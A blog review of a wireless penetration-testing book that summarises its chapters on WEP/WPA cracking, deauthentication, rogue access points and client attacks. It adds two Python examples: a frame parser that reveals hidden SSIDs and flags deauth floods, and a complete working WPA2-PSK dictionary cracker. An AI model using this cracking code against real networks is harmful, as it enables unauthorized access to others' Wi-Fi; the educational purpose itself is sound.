Thursday, November 10, 2011

Book of the Month – BackTrack 5 Wireless Penetration Testing


Here is the core information about the book:

  • Title: BackTrack 5 Wireless Penetration Testing
  • Author: Vivek Ramachandran
  • Publisher: Packt Publishing
  • Pages: 220
  • Release Date: September 9, 2011
  • Rating(Amazon):

Here is the table of contents:
Chapter 1: Wireless Lab Setup
Chapter 2: WLAN and Its Inherent Insecurities
Chapter 3: Bypassing WLAN Authentication
Chapter 4: WLAN Encryption Flaws
Chapter 5: Attacks on the WLAN Infrastructure
Chapter 6: Attacking the Client
Chapter 7: Advanced WLAN Attacks
Chapter 8: Attacking WPA-Enterprise and RADIUS
Chapter 9: WLAN Penetration Testing Methodology
Appendix A: Conclusion and Road Ahead
Appendix B: Pop Quiz Answers

The first chapter opens with the famous line attributed to Abraham Lincoln, stressing the importance of setting up the playground before doing anything else:
"If I had eight hours to chop down a tree, I'd spend six hours sharpening my axe."
It lists the hardware and software requirements: two Wi-Fi enabled laptops, one injection-capable Wi-Fi card (Alfa AWUS036H) and an access point. A longer list of alternative injection-capable Wi-Fi cards would have been welcome, though; it is often difficult to get the right one, especially for those outside the USA/UK. In my early wardriving days, I remember waiting an entire year to get my first injection-capable USB dongle. Without the right card you are on the back foot, as you cannot perform most of the attacks.
The remaining portion of the first chapter shows, with screenshots, how to install BackTrack and set up the access point and wireless cards. Chapter 2 briefly explains the structure of wireless frames and shows how to capture Wi-Fi packets from the air and inject your own packets using the Alfa card.
It gets more interesting with chapter 3, which shows how to bypass various wireless security restrictions such as hidden SSIDs, MAC filters and WEP shared-key authentication. Chapter 4 then shows how to actually crack those 128-bit WEP keys with the aircrack-ng tool (the key length does not help; WEP is broken by design), and finally describes how a cracked WEP key or WPA passphrase can be used to decrypt captured wireless data packets and to connect directly to the WEP/WPA network.
Chapter 5 explains various Denial of Service (DoS) attacks, including de-authentication, dis-association, CTS/RTS attacks and spectrum jamming. It also shows how to perform an 'Evil Twin' attack against a legitimate access point and how to set up a rogue access point to gain backdoor entry into the network.
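Two of the tricks above (chapter 3's hidden-SSID discovery and chapter 5's de-authentication attacks) both come down to reading raw 802.11 management frames. The following is an added example written for this review, not code from the book or from BackTrack. It parses constructed beacon, probe-response and deauth frames (no real capture is included; all addresses and SSIDs are made up), flags access points that hide their SSID, recovers the name from a unicast probe response (the reason SSID hiding is not a security control), and counts deauth/disassoc frames per claimed sender to spot a flood of the kind aireplay-ng generates.

```python
import struct
from collections import Counter

# 802.11 management frame: FC(2) Duration(2) Addr1(6) Addr2(6) Addr3(6) SeqCtl(2)
MGMT_HDR_LEN = 24
BEACON, PROBE_RESP, DISASSOC, DEAUTH = 8, 5, 10, 12
IE_SSID = 0


def mgmt_subtype(frame):
    """Subtype of a management frame, or None for control/data frames."""
    fc0 = frame[0]
    if (fc0 >> 2) & 0x3 != 0:          # type field: 0 = management
        return None
    return (fc0 >> 4) & 0xF


def parse_ies(body):
    """Walk the tagged parameters (element ID, length, value) after the fixed fields."""
    ies, i = {}, 0
    while i + 2 <= len(body):
        eid, ln = body[i], body[i + 1]
        ies[eid] = body[i + 2:i + 2 + ln]
        i += 2 + ln
    return ies


def ssid_of(frame):
    """(BSSID, SSID) from a beacon or probe response. SSID is None when the AP hides it:
    either a zero-length SSID element or one padded with NUL bytes."""
    bssid = frame[16:22].hex(":")
    ies = parse_ies(frame[MGMT_HDR_LEN + 12:])   # skip timestamp(8), interval(2), capability(2)
    raw = ies.get(IE_SSID, b"")
    if not raw or raw.count(0) == len(raw):
        return bssid, None
    return bssid, raw.decode("utf-8", "replace")


def analyse(frames, deauth_threshold=5):
    """Hidden-SSID discovery plus a crude deauth/disassoc flood detector."""
    hidden, names, kicks = set(), {}, Counter()
    for f in frames:
        st = mgmt_subtype(f)
        if st in (BEACON, PROBE_RESP):
            bssid, ssid = ssid_of(f)
            if ssid is None:
                hidden.add(bssid)
            else:
                names[bssid] = ssid      # probe responses carry the real name even for hidden APs
        elif st in (DEAUTH, DISASSOC):
            reason = struct.unpack("<H", f[MGMT_HDR_LEN:MGMT_HDR_LEN + 2])[0]
            kicks[(f[10:16].hex(":"), reason)] += 1     # keyed on Addr2, the (spoofable) sender
    return {
        "hidden": hidden,
        "revealed": {b: names[b] for b in hidden if b in names},
        "deauth_floods": {src for (src, _), n in kicks.items() if n >= deauth_threshold},
        "deauth_reasons": dict(kicks),
    }


# --- constructed frames for the demo (not a real capture) ---
def mgmt_frame(subtype, addr1, addr2, addr3, body):
    return bytes([subtype << 4, 0]) + bytes(2) + addr1 + addr2 + addr3 + bytes(2) + body


def beacon_body(ssid):
    fixed = bytes(8) + struct.pack("<HH", 100, 0x0411)   # timestamp, beacon interval, capability
    return fixed + bytes([IE_SSID, len(ssid)]) + ssid


AP = bytes.fromhex("001122334455")      # made-up access point MAC
STA = bytes.fromhex("66778899aabb")     # made-up client MAC
BCAST = b"\xff" * 6
SAMPLE = [
    mgmt_frame(BEACON, BCAST, AP, AP, beacon_body(b"")),             # hidden: length-0 SSID
    mgmt_frame(BEACON, BCAST, AP, AP, beacon_body(b"\x00" * 9)),     # hidden: NUL-padded variant
    mgmt_frame(PROBE_RESP, STA, AP, AP, beacon_body(b"SecretNet")),  # unicast probe response leaks it
] + [mgmt_frame(DEAUTH, STA, AP, AP, struct.pack("<H", 7))] * 6      # reason 7, as aireplay-ng sends

if __name__ == "__main__":
    print(analyse(SAMPLE))
```

The flood detector keys on Addr2 because, without 802.11w management frame protection, nothing authenticates that field; an attacker simply writes the AP's MAC into it, which is exactly why the frames look like they come from the legitimate AP.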
The weakest point often lies on the client side, so chapter 6 describes the attacks one can perform on wireless clients, including honeypot and mis-association attacks, the Caffe Latte attack, de-authentication and dis-association attacks, the Hirte attack and AP-less WPA-Personal cracking. Chapter 7 shows how to perform wireless-based Man-in-the-Middle (MITM) attacks and then use them to sniff and hijack user sessions.
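The WPA passphrase cracking in chapter 4 and the AP-less WPA-Personal cracking in chapter 6 rest on the same computation, so here is one added example (written for this review; not the book's code and not a real capture) that implements it: PMK = PBKDF2(passphrase, SSID), PTK = PRF-512(PMK, both MACs, both nonces), and a check of the MIC on message 2 of the 4-way handshake. The point the AP-less attack exploits is that the attacker's fake AP chooses the ANonce itself and the client's message 2 already carries a MIC keyed from the passphrase, so nothing beyond that one frame is needed. The SSID, MAC addresses, nonces and wordlist below are all made up.

```python
import hashlib
import hmac

# Offsets inside an EAPOL-Key frame (802.1X header + RSN key descriptor).
NONCE_OFF, MIC_OFF = 17, 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk, aa, spa, anonce, snonce):
    """PRF-512 from IEEE 802.11i with A = "Pairwise key expansion" and
    B = min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce)."""
    b = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion" + b"\x00" + b + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]          # KCK = PTK[0:16] is all the MIC check needs


def eapol_mic(kck, eapol_frame):
    """WPA2 (CCMP) key MIC: HMAC-SHA1 over the frame with its MIC field zeroed, truncated to 16 bytes."""
    zeroed = eapol_frame[:MIC_OFF] + b"\x00" * 16 + eapol_frame[MIC_OFF + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce, mic=b"\x00" * 16, key_data=b""):
    """Constructed 4-way-handshake message 2 (supplicant -> authenticator)."""
    body = (
        bytes([2])                          # descriptor type 2 = RSN
        + (0x010A).to_bytes(2, "big")       # key info: HMAC-SHA1 version, pairwise, MIC present
        + (16).to_bytes(2, "big")           # key length (CCMP)
        + (1).to_bytes(8, "big")            # replay counter
        + snonce
        + bytes(16) + bytes(8) + bytes(8)   # key IV, RSC, key ID (unused in message 2)
        + mic
        + len(key_data).to_bytes(2, "big") + key_data
    )
    return bytes([2, 3]) + len(body).to_bytes(2, "big") + body   # 802.1X v2, type 3 = EAPOL-Key


def crack_psk(ssid, aa, spa, anonce, eapol_msg2, candidates):
    """Dictionary attack needing only the ANonce (chosen by our fake AP) and the
    client's message 2; no real AP and no messages 3/4 are required."""
    snonce = eapol_msg2[NONCE_OFF:NONCE_OFF + 32]
    target = eapol_msg2[MIC_OFF:MIC_OFF + 16]
    for pw in candidates:
        kck = ptk_from_pmk(pmk_from_passphrase(pw, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_msg2), target):
            return pw
    return None


# --- constructed sample handshake (made-up values, not a real capture) ---
SSID = "TestLab"
AA = bytes.fromhex("001122334455")      # fake AP (authenticator) MAC
SPA = bytes.fromhex("66778899aabb")     # victim client (supplicant) MAC
ANONCE = bytes(range(32))               # attacker-chosen in an AP-less attack
SNONCE = bytes(range(32, 64))
TRUE_PASSPHRASE = "correct horse"


def sample_msg2():
    """Message 2 as the victim client would send it to our fake AP."""
    kck = ptk_from_pmk(pmk_from_passphrase(TRUE_PASSPHRASE, SSID), AA, SPA, ANONCE, SNONCE)[:16]
    return build_eapol_msg2(SNONCE, mic=eapol_mic(kck, build_eapol_msg2(SNONCE)))


def demo(wordlist=("password", "letmein", "12345678", "correct horse", "trustno1")):
    return crack_psk(SSID, AA, SPA, ANONCE, sample_msg2(), wordlist)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

Each candidate costs one PBKDF2 run of 4096 iterations, so the attack is only as good as the wordlist; that is the whole argument for the "strong passphrase" advice the book gives for WPA2-PSK.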
Chapter 8 focuses on attacks against WPA-Enterprise, such as exploiting weaknesses in PEAP and EAP-TTLS deployments (in practice, clients that do not validate the RADIUS server's certificate, which lets a rogue AP harvest the inner credentials). It ends with recommendations for a secure wireless configuration: 'WPA2-PSK with a strong passphrase' for small and medium-sized organizations and 'WPA2-Enterprise with EAP-TLS' for larger organizations.
The final chapter touches very briefly on penetration testing methodology in general and then applies it to wireless: a step-by-step discovery of wireless devices, finding unauthorized clients and rogue access points, and then cracking the wireless encryption using the attacks demonstrated in the previous chapters.
